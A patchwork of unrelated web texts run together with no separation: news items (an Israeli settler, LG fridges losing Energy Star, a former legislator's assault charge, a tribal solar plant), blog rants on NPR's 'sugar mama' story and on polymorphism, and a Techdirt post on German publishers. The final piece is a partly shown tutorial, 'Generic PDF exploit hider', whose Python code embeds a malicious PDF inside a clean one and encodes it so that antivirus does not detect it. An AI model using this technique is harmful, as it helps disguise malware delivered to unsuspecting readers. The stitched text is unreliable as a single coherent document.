He was ambushed by a group of Palestinian militants who mistook him for a settler , he says .
Severely wounded , Cohen lost control of the car and rammed through an Israeli roadblock .
Israeli soldiers took him for a terrorist and they , too , shot at him .
Left unable to walk without the aid of crutches , Cohen receives a small pension from the Israeli government for his wounds .
But he says the money is not enough .
" We live here in a jungle , " says Cohen .
" I love the country of Israel .
I know they have their own problems , but they need to pay attention to us . "
Asked if he would ever leave the mountain , Cohen remains adamant .
" We will not leave .
This is our home . "
This time DzineBlog presents you with amazing illustration design inspiration , we run into some cool portfolio on the web we found out some great illustration design , i mean u ‘ll love these ,
The work of the artists reflects various styles , personalities and cultures , and all designs have one thing in common : they are colorful explosions of energy , optimism and inspirational not all are pure illustration some of these are illustration with images and so , Basically illustration makes the design look pretty
Hope you are inspired by this collection
Elizabeth Warren on the Economy
It appears that your computer does not have the Flash Player required to view NOW videos .
Visit Adobe to download and install the latest version of the Flash Player .
Modern Marriages : The Rise Of The Sugar Mama
Monnig says his wife would love to be a full - time mom .
But financially speaking , that just would n't make sense .
About two weeks ago , NPR posted this on Facebook : Which , when I read the comments ( there were only 300 or so at the time ) , produced some fairly interesting answers with only a few ridiculous responses .
Most of the responders ( at that point ) , men and women , stated their basic stats and that their arrangement worked for them .
A few replied that there was some adjustment in thinking , at first , but it 's been great .
To which this was the end product published by NPR today : What I said out loud when I read it :
Are you fucking serious ?
" Sugar Mama " and " Sugar Daddy " imply an unequal , non-emotional , business - like relationship where one partner is little more than a bank account ( or a dupe ) and the other partner little more than a someone in search of that account .
Neither partner is particularly painted in a good light .
The terms are antiquated and offensive .
They have no business being used to describe a partnership where one partner simply earns more money or has more formal education than the other - - for those situations do not make for an unequal , non-emotional , business - like partnership .
I mean , honestly .
While the article has a small amount of interesting information , as comparing 70s PEW studies to now , it 's just a whole lot of little fail under that great big fail - filled headline : that old hoary " joke " about women getting a M.R.S being in the article , using the term " marriage market " ( again with the business references ) , the use of just three couples and choosing two who have issues with their situation , having the gumption to criticize " pop culture " for antiquated ideas when using the term " sugar mama " in the headline , and referring to these relationships as " the new economic order " when it 's 22 % of marriages -- hardly a " new order " .
Oh and we can't forget this which accompanied the article :
Yes , really .
That 's what they chose to go with this article .
Also , at the very end in the three whole lines devoted to the idea of the husband being the stay - at - home parent , this was said :
Now , I have no idea if Monnig used the term " full time mom " or if it was NPR .
Either way , though , it 's wrong .
You never stop being a parent , no matter if one works outside the home or not .
One does n't go to " part time " status once the parent goes out the door to work -- or the kids go out the door to school .
The old line of thinking that a parent ( particularly a mother ) is n't a " full " parent simply because they work outside the home is flat - out bullshit and needs to go away just as quickly as the Sugar references .
The Department of Energy has announced that , as of Jan. 20 , LG Electronics will be banned from using the Energy Star label on 20 of its refrigerator - freezer models .
The agency , which has received criticism for failing to ensure the integrity of products bearing the Energy Star label , said the refrigerators did not deliver required energy and cost savings , and that it was taking steps to protect the American public .
“ D.O.E. is proceeding with this action after multiple independent labs have confirmed that when certain LG French - door refrigerator - freezers are tested using existing D.O.E. test procedures , they do not qualify for the Energy Star program , ” the agency stated .
LG responded by filing a lawsuit against D.O.E. in federal court .
The company claims the agency is requiring use of a new test procedure to measure efficiency that was not clarified to LG .
“ LG shares the D.O.E. ’s objective of improving the rules to provide accurate energy information to consumers , ” the company said in a prepared statement , “ but LG objects to the process which the D.O.E. is following . ”
In a brief filed with the court opposing LG ’s suit , D.O.E. said it did not believe the company would suffer irreparable harm due to the loss of the Energy Star designation , as claimed by LG , but it did acknowledge that LG ’s ability to fully participate in appliance rebate programs could be affected .
Such programs often require Energy Star certification as an eligibility requirement .
Testing of LG ’s French - door fridges conducted by Consumer Reports last year found that energy usage was typically twice that claimed by the company .
The agency affirmed this discrepancy in subsequent testing and attributed it to the company measuring energy use with the ice - making system switched off .
D.O.E. directs manufacturers to run the energy tests while the ice - maker and its components are on , but “ inoperative , ” or not in active operation .
This allows for the assessment of overall energy use while the ice - maker is powered on but not actively making ice , Jen Stutsman , a D.O.E. spokesperson , told Green Inc .
The definition of the word “ inoperative ” is at the core of the dispute .
According to D.O.E. ’s brief , LG understood “ inoperative ” to mean turning the ice - maker off .
D.O.E , by contrast , believes the test procedures require ice - makers to be “ inoperative , not off . ”
D.O.E. said its action against LG was part of a broader effort by the agency to increase enforcement efforts for both Energy Star and the federal appliance standard program , which sets mandatory energy efficiency and water use requirements for a number of products , from air conditioners to urinals .
“ The Obama administration has made energy efficiency one of its highest priorities , undertaking a multipronged effort to expand access to energy efficiency technologies , protect the Energy Star label , and increase the enforcement of minimum efficiency standards for appliances , ” Ms. Stutsman said .
“ Over the coming months , the Department of Energy will continue to move aggressively to meet our energy efficiency goals and ensure that the American people are benefiting from the energy and cost savings promised by manufacturers across the country . ”
Just what we need :
An antidote to dumbed - down rom-coms and dick flicks .
The Runaways is " one of the most piquantly feminist films to touch down this year , " Chris Lee writes for the LA Times .
He also calls it :
… A punk - infused genre pic with a pronounced generational viewpoint and no shortage of blood , drug abuse and bodily effluvia .
Advertisement
Sounds awesome .
What more could you want ?!
The film is written and directed by Floria Sigismondi , " a striking woman with a mane of raven - black hair who was clad in a vampire - chic , all - black ensemble . "
( You may know her as the director of such goth - tastic videos as Marilyn Manson 's " The Beautiful People " and Christina Aguilera 's " Fighter . " )
According to Lee ,
It 's not a band movie , per se , but : " an impressionistic character study illuminating a unique female predicament :
What happens when teenage girls get handed too much , too soon via worldwide rock stardom ? "
Advertisement
Sigismondi explains the concept thusly : " It 's young girls getting swept up into a world they could n't handle …
Feeding on those confusing feelings that develop from moving from girl to woman , I could reach deep into myself to find those things . "
There 's even some girl - on - girl action ; Dakota Fanning , who plays Cherie Currie , makes out with Kristen Stewart , who plays Joan Jett , at a roller rink .
" In ' Edgeplay , ' Cherie mentions that Joan is really good in bed , " Sigismondi said .
" I thought , ' I have to pry into this a bit .
It will cause an explosion in the film .
Why not go there ? ' "
G/O Media may get a commission Subscribe and Get Your First Bag Free Promo Code AtlasCoffeeDay20
Not only is The Runaways a rocker - chick film directed by a woman , featuring two women who talk to each other about something other than a man ( hence adhering to the Bechdel rule ) , it 's got Joan Jett 's approval .
Watching Fanning and Stewart perform her music , was " surreal , " she says , " But I [ had ] a smile on my face . "
Advertisement
Kristen Stewart , Dakota Fanning Get Wild With ' The Runaways ' [ LA Times ]
Every OOP fan is almost by definition a fan of polymorphism .
Lots of otherwise good books ( e.g. Fowler 's Refactoring ) go so far as to say if you use runtime type checks , e.g. Java 's " instanceof " operator , then you 're probably an evil person who threatens little children with switch statements .
Generally speaking , I would agree that the use of " instanceof " and its ilk are usually a sign of weak OOP design skills .
Polymorphism is preferable to runtime type checks , resulting in cleaner and more maintainable code .
However , I think there 's at least one situation , almost common enough to merit being a pattern of its own , where you simply can't use polymorphism .
I 'd love to , and if you know how , please tell me , but I just do n't think it 's possible , at least not with more or less static languages like Java and C ++.
Polymorphism Defined
In case you 're ( somewhat ) unfamiliar with OOP terminology , polymorphism is a pretentious name for the concept of late binding .
Late binding is a pretentious name ( you 'll see a pattern here if you dig far enough ) for deferring the decision for which method to call until runtime , when the target is inspected to see if it responds to the message .
In performance - oriented languages like C++ , Java and OCaml , methods are given numbers , and for each class a method table is built out and scanned at runtime .
In languages oriented towards runtime flexibility , method lookups are typically done by hashing on the method name .
Otherwise the two approaches are pretty much equivalent .
Virtual methods do n't , by themselves , yield polymorphism .
The polymorphic part comes into play when you have multiple subclasses of a given class , each implementing their own version of the polymorphic method , and each handling it differently .
As an extremely trite textbook example , if you go to the zoo , you 'll see that all of the animals have different ways of handling the createBadSmell ( ) message .
Well , they 're pretty similar in some respects ; I guess it 's more a question of magnitude .
I still can't decide whether the hippo's performance beat out the giraffe 's , but ask me about it sometime .
Polymorphism Struts Its Stuff
As an example of polymorphism in action , let 's look at the classic " eval " interview question , which ( as far as I know ) was brought to Amazon by Ron Braunstein .
The question is quite a rich one , as it manages to probe a wide variety of important skills : OOP design , recursion , binary trees , polymorphism and runtime typing , general coding skills , and ( if you want to make it extra hard ) parsing theory .
At some point , the candidate hopefully realizes that you can represent an arithmetic expression as a binary tree , assuming you 're only using binary operators such as " + " , " - " , " * " , " / " .
The leaf nodes are all numbers , and the internal nodes are all operators .
Evaluating the expression means walking the tree .
If the candidate does n't realize this , you can gently lead them to it , or if necessary , just tell them .
Even if you tell them , it 's still an interesting problem .
The first half of the question , which some people ( whose names I will protect to my dying breath , but their initials are Willie Lewis ) feel is a Job Requirement If You Want To Call Yourself A Developer And Work At Amazon , is actually kinda hard .
The question is : how do you go from an arithmetic expression ( e.g. in a string ) such as " 2 + ( 2 ) " to an expression tree .
We may have an ADJ challenge on this question at some point .
The second half is : let 's say this is a 2 - person project , and your partner , who we 'll call " Willie " , is responsible for transforming the string expression into a tree .
You get the easy part : you need to decide what classes Willie is to construct the tree with .
You can do it in any language , but make sure you pick one , or Willie will hand you assembly language .
If he 's feeling ornery , it will be for a processor that is no longer manufactured in production .
You'd be amazed at how many candidates boff this one .
I wo n't give away the answer , but a Standard Bad Solution involves the use of a switch or case statment ( or just good old - fashioned cascaded - ifs ) .
A Slightly Better Solution involves using a table of function pointers , and the Probably Best Solution involves using polymorphism .
I encourage you to work through it sometime .
Fun stuff !
Ironically ( as you 'll see later ) , the polymorphic solution is ideal if you want to make an extensible system .
If you want to add new functions to your system without having to recompile everything - and in particular , without having to add more and more cases to your Giant 500 - Case Case Statement , then you 'll want to use polymorphism .
Three Polymorphic Cheers for Polymorphism
So polymorphism , so far anyway , seems kind of useful .
By far the most useful , uh , use , of polymorphism is the polymorphic print statement .
If you 've programmed in Java , Python , Ruby , or another " real " OO language , then you probably take polymorphic print statements for granted .
You tell an object to print itself , and by golly , it does .
Each object tells you exactly what you need to know about its internal state .
Very useful for debugging , tracing , logging , and maybe even documentation .
If you 're using a twisted facade of an OO language like C++ or Perl , with object orientation bolted on like a pair of $ 2500 rims on a 1978 Subaru Legacy , then you 're stuck with using a debugger , or Data : : Dumper , or some such .
Sucks to be you !
( Rhetorical question :
Why did we have to pick C++ and Perl ?
They 're two of the worst languages in the world !
You might as well use Pascal and Cobol , for cryin ' out loud . )
Incidentally , the polymorphic print statement is the primary reason I 've been rather quiet about OCaml lately .
OCaml , for reasons I have n't fully grokked yet , but which appear to be along the lines of " criminal insanity of the designers " , does n't provide a polymorphic print statement , so you can't actually print out arbitrary objects to the console for debugging purposes .
I hope that this was necessary to achieve OCaml 's legendary C++- beating performance , because any other reason would be a face - smashing insult to usability .
At least they have a debugger that can step backwards in time .
You 'll need it .
So !
We like polymorphism .
Polymorphism is the opposite of micromanaging .
You tell objects to do something , without telling them how to do it , and they dutifully comply by spending the day watching Strong Bad clips online .
Those silly objects !
Gotta love 'em .
But polymorphism , like all good protagonists , has a Dark Side .
In polymorphism 's case , it 's not quite as bad as the dark side exhibited by , say , Anakin Skywalker , but it 's a dark side nonetheless .
Polymorphism 's Paradox
Using polymorphism in your code has an unspoken but very significant requirement : you have to be able to add it in later .
At least in static languages like Java and C++ , if you add a polymorphic method , you have to recompile the classes for which you implement the method .
That means you have to have the source code , and be able to modify it .
There is a certain class of system for which this is n't possible , at least as far as I can tell .
That class would be : extensible systems .
Let 's say , hypothetically , that you 're building a fancy system that allows your end - users to add code .
This is a nontrivial task for lots of reasons , including security , thread - safety , and others as well .
But these systems exist !
For instance , there are online games that allow users to add in their own code , without having access to the original source code .
Most multiplayer online games are actually moving in this direction - execs ( no pun intended ) have realized that users can and do create good content , so the games are opening up their APIs and letting users extend the systems by writing their own monsters , spells , and so on .
Something tells me that Web Services is in a similar boat .
Any time you create a user - extensible system , you need to do about three times as much as work , the extra 2 x being work to arrange your internal APIs and classes so that they can be modified by end -users .
Java 's Swing is a good example of this .
Any time you build an extensible system , you 'll run into the Inventor 's Paradox , which you can read about elsewhere , but the gist of it is that you can't predict in advance what changes your users will want to make to your system .
You can go to any length — even expose every single line of code in your system as its own virtual function — and your users will inevitably run into something that they can't specialize .
It 's a real pisser , and I do n't pretend to have an answer for it .
Swing handles it by creating lots of hooks , which makes it a monstrously large API to master .
A Monster of a Problem
To make this concrete , let 's go back to the online game scenario .
Let 's say you 've done your best to expose APIs and classes for creating and manipulating spells , monsters and other in - game objects .
Let 's say you 've got a big installed base of monsters .
I 'm sure you can imagine some .
Now let 's say one of your users wants to come in and write a little Opinionated Elf monster .
This is a contrived example , similar to the Halting Problem in the way it proves its point , but situations like it can happen in practice .
Let 's say the Opinionated Elf 's sole purpose in life is to proclaim whether it likes other monsters or not .
It sits on your shoulder , and whenever you run into , say , an Orc , it screams bloodthirstily : " I hate Orcs !!!
Aaaaaargh !!! "
( This , incidentally , is how I feel about C++. )
The polymorphic approach to this problem is simple : go through every one of your 150 monsters and add a doesMrOpinionatedElfHateYou ( ) method .
Gosh .
That sounds insanely stupid .
But it 's the true polymorphic approach , right ?
If you have a bunch of similar objects ( in this case , monsters ) , and they 're all supposed to respond differently to some situation , then you add a virtual method to them and implement it differently for each object .
Right ?
Obviously it does n't work worth a damn in this case , and even if you could do it ( and you can't , since the user writing this little elf has no access to the source code ) , it would smack of Bad Design .
Clearly there 's no reason to put such a specific method on every monster object in the game .
What if we later decide the Opinionated Elf is a copyright violation , and he has to be removed ?
You 'd have to go back and remove that method from 150 classes .
As far as I know ( and I do n't claim to be a good designer , just one who would like to know the right answer ) , the right way to solve this is using runtime typing .
The code would look something like this :
public boolean doesElfLikeIt ( Monster mon )
{
if ( mon instanceof Orc ) { return false ; }
if ( mon instanceof Elf ) { return true ; }
... < repeat 150 times >
}
Admittedly , you could be an OO Freak , and create 150 helper classes for the Opinionated Elf , one per monster .
That does n't really solve the root problem , though , which is that the discriminating behavior is all in the caller , not the callee .
That 's where it belongs - in the caller , that is .
There are some higher - level languages that solve this a bit more elegantly , and I do stress " a bit " .
In Ruby , for instance , you can add methods to other classes , even built - in ones , even if you do n't have the source code .
For instance , you could put the following code into the Opinionated Elf file :
class
Orc def doesElfLikeMe ; return false ; end end class Troll def doesElfLikeMe ; return false ; end end class ElfMaiden def doesElfLikeMe ; return true ; end end ...
Ruby actually loads all the classes you specify , if they 're not loaded already , and adds your method to each of them .
This is a pretty nifty feature , in general .
Here though , I think there are pros and cons to this approach .
What 's happening is that in Ruby ( and most other high - level languages ) , methods are just entries in a hashtable , one per class , and you 're going in and stuffing your entry into the hashtable for each subclass of Monster .
The advantages are :
all of the Opinionated Elf code is encapsulated in his file
the code is n't added unless the elf file is loaded
anyone else in the system can ask the target whether the elf likes them or not
The downside is that you need a default behavior if your elf does n't recognize a monster that 's been added since his code was written .
If someone adds a Gremlin , your elf will be stuck screaming something like " Gosh , what 's THAT ? " until you can update his code to include a case for gremlins .
I guess if you could somehow enumerate all the classes in the system , and check if they derive from Monster , then you could do this whole thing in a few lines of code .
In Ruby , I bet you can ... but only for the already - loaded classes .
It does n't work for classes still sitting on disk !
You could solve that , but then there 's the network ...
But needing a default behavior is n't all that bad .
There are worse downsides .
Thread - safety is one ; it bothers me a lot — I do n't think Ruby 's semantics for thread - safety are well - defined in this case .
Is there a class lock ?
What does the lock do with threads executing in instances of pre-Elf class ?
I do n't read Japanese well enough to know whether the proof is in the spec or the implementation .
But the real problem , the one that really gets me , is that your code is going in and distributing itself across all the classes in the system .
It feels like a violation of encapsulation .
In fact it 's even deeper than that .
It feels like Bad Design .
Here we have a situation in which an observer is making some sort of judgement call , and we 're sticking the judgement code into the observee .
It 's as if I went around to all the employees on the floor and handed them little badges , telling them : " Please hold on to this badge .
It says whether I like you or not . "
It 's not the way things work in the real world , and OOP is supposed to model the world .
Polymorphism Revisited
Well !
Now that I 've put it that way , polymorphism does n't seem like so much of a silver bullet anymore .
Even in a non-extensible system , if you have some sort of decision to make based on the type of the target , it may not make sense to put the decision into the target .
A more practical , down - to - earth example is authentication .
Let me ask you : if you were designing a permissions system , would you design it by having a virtual doYouHaveAccess ( ) method , and have all possible comers implement the method ?
I.e. , would you have the security guard ask everyone if they 're allowed in the building ?
Absolutely not .
You'd have your code do some runtime checks :
public boolean denyEntryToBuilding ( Person p )
{
return ( p.hasNoBadge ( ) ||
p.isSuspiciousLooking ( ) ||
p.hasMachineGun ( ) ) ;
}
But wait - none of those things was overtly a class check .
I did n't say " p instanceof MachineGunBearer " , for instance .
What 's up with that ?
Well , the " type " of an object is , for all intents and purposes , the union of its class ( which is pretty much hardwired , like genetics ) and its properties , which might or might not be changed at runtime .
It 's a separate essay , but I think this implies that type is best represented via properties rather than classes , because of the inherent inflexibility of classes .
But in " traditional " languages like C++ and Java , this makes code sharing a bit harder , because of the lack of support for syntactic delegation .
If that did n't make sense , it 's OK : I 'm on my 3rd glass of wine , and nearing the pass - out point .
Let 's just say it 's the subject of another article .
In the meantime , I hope I 've made my main point clear , which is that polymorphism only makes sense when the polymorphic behavior is really a behavior of the target .
When it 's the behavior of the observer , you need runtime typing .
Well , I hope you 've learned something in today 's Drunken Blog Entry .
I know I have .
For one thing , I learned that Google 's search engine is actually smart enough to correct " anikin skywalker " to say " Did you mean anakin skywalker ? "
Those hoity - toity bastards .
It 's not like they own the copyright .
I also learned that the correct length for a blog entry is exactly 2 glasses of wine .
If you go any longer than that , you 'll start ranting semi-incoherently .
Your typing really goes to hell , too .
See you next week for the next installment of ...
Stevey 's Drunken Blog Rants ( tm )
( Published August 25 , 2004 )
Comments
> polymorphism only makes sense when the polymorphic behavior
> is really a behavior of the target .
When it 's the behavior
> of the observer , you need runtime typing .
Is it runtime type - checking that is called for , or does it just look like that because Java overloads " instanceof " to test for type — and interface ?
In Objective C , for example , you could use protocols ( i.e. " interfaces " ) to implement the marker interface pattern .
Objc Categories ( a way of packaging extensions to a pre-existing class ) would enable you to pretty cleanly extend the relevant monster classes from the comfort of the Elf interface file .
You could then test it like so ...
if ( [ creature conformsToProtocol : @protocol ( AnnoysElves ) ] ) { ... }
Perhaps this approach would avoid inadvertently conforming to @protocol ( AnnoysMartinFowler ) .
Yeah , using Objective C protocols and marker interfaces is similar to Ruby 's approach ( Ruby stole the best stuff from - every - language ... ) .
In Ruby you can modify any class ; they 're always " open " , and Ruby 's been switching to something they call " duck typing " , which is exactly the difference between conformsToProtocol ( ) and instanceof .
They call it respond_to ? , but it 's the same basic idea : they do n't care what the overall type of an object is , just whether it responds to a message with the right signature .
There 's always the chance that it can be mistaken identity , but with reasonably specific method names you can avoid that pretty well .
I 'm not sure if it would appease Fowler and friends , though , since it 's either violating encapsulation ( by mucking with classes at runtime ) , or polymorphism ( by not mucking with them ) .
I do n't think they 've addressed this situation in the books ; maybe we should just ask him about it . :)
Posted by : Steve Yegge at September 22 , 2004 05:06 AM
Los Angeles County prosecutors have charged former state legislator Walter Karabian with misdemeanor assault for allegedly running into a parking attendant with his car last month during a USC football game .
Karabian , 71 , allegedly tried to drive his car into a parking structure at Exposition Park but was stopped by a female attendant who refused him entry for not having a proper permit .
Authorities then allege the attorney drove his car forward , striking the woman several times .
She was not seriously injured .
German Publishers Go After Google ; Apparently Very Confused About How The Internet Works
from the welcome - to - online dept
Hans -Joachim Fuhrmann , a spokesman for the German Newspaper Publishers Association , said the Web sites of all German newspapers and magazines together made 100 million euros , or $ 143 million , in ad revenue , while Google generated 1.2 billion euros from search advertising in Germany .
" Google says it brings us traffic , but the problem is that Google earns billions , and we earn nothing , " Mr. Fuhrmann said .
The publishers also complained about what they saw as a lack of transparency in the way Google presents search results and news snippets in its Google News service , saying the company was manipulating the results to help maintain its strong position ....
" We often feel like Web sites are elevated in Google 's search results if they have a strong business relationship with Google , and we think we can prove it , " Mr. Fuhrmann said .
Thank you for reading this Techdirt post .
With so many things competing for everyone ’s attention these days , we really appreciate you giving us your time .
We work hard every day to put quality content out there for our community .
Techdirt is one of the few remaining truly independent media outlets .
We do not have a giant corporation behind us , and we rely heavily on our community to support us , in an age when advertisers are increasingly uninterested in sponsoring small , independent sites — especially a site like ours that is unwilling to pull punches in its reporting and analysis .
While other websites have resorted to paywalls , registration requirements , and increasingly annoying / intrusive advertising , we have always kept Techdirt open and available to anyone .
But in order to continue doing so , we need your support .
We offer a variety of ways for our readers to support us , from direct donations to special subscriptions and cool merchandise — and every little bit helps .
Thank you .
– The Techdirt Team
It looks like Germany may be a new front in clueless attacks on Google .
With newspapers and magazines admitting that they 're too clueless to know what to do with traffic Google sends them , officials in Germany are opening an antitrust investigation into Google based on some of the most ridiculous logic we 've heard to date :
Okay .
Let 's pick apart this apples and oranges comparison .
First off , Google earns 1.2 billion euros fromwhich has almost nothing to do with .
It comes from people searching for cameras or cribs or cars .
Google News hadat all for most of its existence and only introduced adsless than a year ago .
In other words , no , Google is not making more than newspapers and magazines when it comes to its News site in Germany .
And , even if Googlemaking more money ( which , again , there 's no evidence that this is true ) , that still does n't excuse Fuhrmann 's claims -- which basically amount to him admitting that Google figured out how to make money and the companies he represents did not .
Yet the publishers he represents had all of the advantages in the world .
They were local .
Google was not .
They had been around for many more years than Google .
They had brand recognition and loyalty that Google did not .
Furhmann is basically admitting what a colossal failure the companies he represents have been .
They failed to capitalize on a huge opportunity .
And now , when Google sends them traffic , they are still failing to use that traffic wisely .
And then they Google for it ?
Wow .
So go ahead and prove it .
First of all , Google is a private company and can rank sites however it wants .
It 's anof what Google feels is most relevant .
If Google was not doing a good job , then people would .
So basically , at this point , Fuhrmann has n't just admitted that the publishers he represents have failed miserably to set up even the most basic business models for adapting to the internet , he 's now suggesting thatby not presenting the absolute best results !
It 's difficult to see how this makes any sense at all .
The publishers are claiming that Google is purposely degrading its results ( and they can prove it ! ) and at the same time complaining that they can't compete against those degraded results .
Wow .
On top of all that , the article reminds us , as we discussed last year , that these publishers have convinced German Chancellor Angela Merkel to support a new copyright law that would force aggregators to pay up just to link to stories .
It 's as if Germany does n't want the internet at all .
Filed Under : business models , germany , internet , newspapers , publishers
Companies : google
A poverty - stricken Indian tribe that holds the sun and nature 's other gifts sacred sees a brighter future for itself in solar power .
The 3,000 members of the Jemez Pueblo are on the verge of building the nation 's first utility - scale solar plant on tribal land , a project that could bring in millions of dollars .
Experts say tapping into the sun , wind and geothermal energy on Indian land could generate the kind of wealth many tribes have seen from slot machines and blackjack tables .
" We do n't have any revenue coming in except for a little convenience store , " says James Roger Madalena , a former tribal governor who now represents the pueblo in the state Legislature .
" It 's very critical that we become innovative , creative , that we come up with something that will last generations without having a devastating impact on the environment . "
The 30 - acre site where 14,850 solar panels will be set up has been selected , and after four years of arduous planning and negotiations , a contract to sell outsiders the electricity produced by the four - megawatt operation is at hand .
The plant would be capable of cranking out enough electricity to power about 600 homes .
The project — which would cost about $ 22 million , financed through government grants , loans and tax credits — could bring in around $ 25 million over the next 25 years .
That could help the tribe improve its antiquated drinking water system and replace the lagoons it uses to treat wastewater .
Renewable energy is a new option for bringing revenue to Indian country , where many communities are poverty - stricken and unemployment is often double the national rate .
Jemez Pueblo 's effort comes after the federal government in 2008 turned down a request to let it build a casino because the proposed site was too far away from the community .
" Not every tribe is a gaming tribe , but every tribe is an energy tribe , " says Roger Fragua , a Denver - based consultant who works with the Council of Energy Resource Tribes .
Indian tribes control more than 55 million acres of land across the nation , and those lands are capable of producing an estimated 535 billion kilowatt hours of electricity per year from wind power , according to the U.S. Department of Energy 's Tribal Energy Program .
Solar has even greater promise , at 17 trillion kilowatt hours per year , or more than four times the amount of electricity generated annually in the U.S .
" There 's huge potential , " says Jerry Pardilla , executive director of the National Tribal Environmental Council .
President Barack Obama acknowledged the possibilities during a meeting last fall with leaders of the nation 's tribes .
He says he would work to ensure tribes have access to transmission and financing for energy projects .
From 2002 to 2008 , the Tribal Energy Program funded nearly 100 projects totaling $ 16.5 million .
A 2005 federal law authorizes up to $ 20 million for the program each year .
One of the leading tribes has been the Campo Kumeyaay Nation outside of San Diego .
It is home to a 50 - megawatt wind farm , and the tribe is joining forces with San Diego Gas & Electric Co. to build a second wind farm capable of producing 160 megawatts .
Tribal wind farms have also sprouted up across the Midwest .
However , the development of solar power on Indian land is in its infancy .
While many tribes use solar panels to power casinos and individual homes , Jemez
Pueblo is leading the way in developing a grid - connected solar array for selling power to outside customers .
Every fall , Jemez Pueblo gives thanks to nature in an age - old harvest celebration during which dancers wearing headdresses and jingling bells pound the ground with their feet to the beat of drums .
Tribal members hold the sun sacred as the source of the warmth and light needed to grow crops in this remote area about 50 miles northwest of Albuquerque .
Just beyond the dirt baseball diamond and cinderblock dugouts are the rolling hills dotted with pinon and prickly pear cactus where the panels will be laid out and connected to the transmission line already overhead .
State and federal grants have covered many of the tribe 's planning costs , while engineers and legal firms have donated their expertise .
" We know other tribes are interested in doing the very same thing , and they 're following our project to see what kind of success we have , " says Greg Kaufman , an environmental scientist who works with the pueblo 's Resource Protection Department .
The tribe is not looking to get wealthy with its solar panels , Mr. Kaufman says .
He says tribal leaders ' primary concern is making life better for tribal members .
Experts say demand for renewable energy in the U.S. will continue to grow as the government tries to reduce greenhouse gas emissions , and Indian tribes could play a big role .
" Indian people have always given , " Mr. Fragua says .
" We have an opportunity to give once again to America and her energy security . "
Editor ’s note : The Monitor 's Environment section has a new URL .
And there 's a new URL for its Bright Green blog .
We hope you 'll bookmark these and visit often .
Generic PDF exploit hider .
embedPDF.py and goodbye AV detection ( 01/2010 ) January 13 , 2010
This post is about hiding an evil PDF into a saint PDF .
The objective is to embed a pdf into another pdf , and make the reader parse the embedded one without user intervention .
If we manage to do this we ’ll be able to ‘ filter ’ the embedded file and hide it through some pdf encoding filters ( flatedecode , crypt , etc ) , that way making it invisible from the outside .
And at last , as we ’ll be using miniPDF.py , we ’ll pass everything through the ( unfinished ) obfuscated version of the miniPDF .
py lib , here .
Hey !
But , can we embed files into a PDF at all ?
Well as stated here …
PDS3200:2008::7.11.4 Embedded File Streams
If a PDF file contains file specifications that refer to an external file and the PDF file is archived or transmitted , some provision should be made to make sure that the external references will remain valid .
One way to do this is to arrange for copies of the external files to accompany the PDF file .
Embedded file streams ( PDF 1.3 ) address this problem by allowing the contents of referenced files to be embedded directly within the body of the PDF file .
This makes the PDF file a self - contained unit that can be stored or transmitted as a single entity .
( The embedded files are included purely for convenience and need not be directly processed by any conforming reader . )
.. YES we can .
There are probably other ways to embed files , as in the relatively new PDF ‘ collection ’ thing , but that ’s other story .
I ) Embeed a PDF into a PDF
OK , let ’s start !
First thing we need is a clean PDF to hide .
I needs to be one with a correct xref and with a clean overall file structure .
So , for a start we hide a good pdf , then we ’ll see how to embed a bad one .
There is a clean minimalistic text displaying pdf generated in this post , the pdf here .
Now we need to construct the host pdf .
We are not really interesting in putting anything here so let ’s construct an empty pdf ( mostly as done for the JS - to_PDF post , here ) .
As in the earlier post first we import the lib and create a PDFDoc object representing a document in memory …
from miniPDF import *
# The PDF document
doc= PDFDoc ( )
Prepare the Pages dictionary , wich is in charge of linking to the pages ..
pages = PDFDict ( )
pages.add(‘ Type ’ , PDFName ( ‘ Pages ’ ) )
doc.add ( pages )
Prepare the Catalog dictionary .
catalog = PDFDict ( )
catalog.add (‘ Type ’ , PDFName ( ‘ Catalog ’ ) )
catalog.add (‘ Pages ’ , PDFRef ( pages ) )
doc.add ( catalog )
The Catalog dictionary is the main root object of the PDF …
doc.setRoot(catalog )
We do n’t really need any content on our pdf hosting PDF .
We add an empty content for the dummy page ,
contents = PDFStream ( ” )
doc.add ( contents )
and the single dummy page .
Check out we NEED to honnor the Parent linking to the Pages dictionary , otherwise our magic wo n’t work .
page = PDFDict ( )
page.add (‘ Type ’ , PDFName ( ‘ Page ’ ) )
page.add (‘ Parent ’ , PDFRef ( pages ) )
page.add(‘ Contents ’ , PDFRef ( contents ) )
#<- NEEDED !
doc.add ( page )
And finally populate the pages dictionary .
# link the page to the pages list
pages.add (‘ Kids ’ , PDFArray ( [ PDFRef ( page ) ] ) )
pages.add(‘ Count ’ , PDFNum ( 1 ) )
And with this ..
print doc
it renders the incomplete base PDF to the stdout .
Something like this .
The incomplete pdf is here and the incomplete py , here .
OK , we have an empty base pdf , now let ’s ..
Insert an embedded file .
For this we need to
add the Embedded File stream containing the actual embedded file data , build a FileSpec dictionary for it , construct the Embedded Files list and put that under the global names list in the Catalog .
(1) To add the Embedded File stream to the document do something like this .
Get the filename to hide form the parameters , and load its content to memory …
import sys
fileStr = file ( sys.argv [ 1 ] ) .read ( )
Construct a EmbeddedFile Dictionary as stated in PDF3200:2008.1::7.11.4 ( Embedded File Streams )
ef = PDFStream ( fileStr )
ef.add (‘ Type ’ , PDFName ( ‘ EmbeddedFile ’ ) )
ef.add (‘ Subtype ’, PDFName( ‘ application #2Fpdf ’ ) )
ef.add ( ‘ Params ’, PDFDict ( {‘ Size ’ : PDFNum ( len( fileStr ) ) ,
‘ CheckSum ’ : PDFOctalString(md5.new(fileStr).digest ( ) ) } ) )
ef.add(‘DL ’ , ‘ %d ‘% len( fileStr ) )
Note that .. the ‘ Type ’ , ‘ SubType ’ and ‘ Params ’ tags are not strictly necesary .
EXAMPLE : If we embeed a file containin only “ AAAA ” the resulting Embedded File stream will look like …
N 0 obj << / Type / Embedded File / Subtype /application # 2 Fpdf / DL 4 / Length 4 / Params << / CheckSum ( \256\133\106\214\16707\241\363\323 ... / Size 5 >> >> stream AAAA endstream endobj
(2) Now we ’ll construct the FileSpec dictionary for it .
As stated in the rather confusing PDF3200:2008.1::7.11.3 ( File Specification Dictionaries ) , a file specification dictionary for an embedded file will need to have this tags on it …
Key Type Value Type Name
The type of PDF object that this dictionary describes ; shall be Filespec for a file specification dictionary .
F string A file specification string of the form described in PF3200:2008.1::7.11.2 , “ File Specification Strings , ” EF dictionary A dictionary containing a subset of the keys F , UF , DOS , Mac , and Unix , corresponding to the entries by those names in the file specification dictionary .
The value of each such key shall be an embedded file stream ( see 7.11.4 , “ Embedded File Streams ” ) containing the corresponding file .
